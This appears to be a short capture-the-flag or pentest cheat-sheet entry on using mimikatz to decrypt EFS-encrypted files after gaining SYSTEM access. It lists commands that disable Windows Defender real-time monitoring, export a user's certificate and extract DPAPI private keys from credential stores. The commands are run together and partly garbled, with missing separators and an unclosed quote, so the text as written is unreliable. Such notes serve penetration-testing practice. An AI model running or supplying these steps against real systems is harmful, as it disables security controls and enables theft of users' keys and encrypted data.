Decrypt EFS encrypted files with mimikatz
Decrypt EFS encrypted files with mimikatz
Requirements: System/root level access
Example: We have a root flag that we can't read even as the SYSTEM user. We do the steps below:
cipher /c root.txt powershell set-mppreference -disablerealtimemonitoring $true ./mimikatz.exeprivilege::debugcrypto::system /file:"C:\Users\USER\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\CERTIFICATE_STRING /export dpapi::capi /in:"C:\Users\USER\AppData\Roaming\Microsoft\Crypto\RSA\USER_SID\RANDOM_NUMBERS" Last updated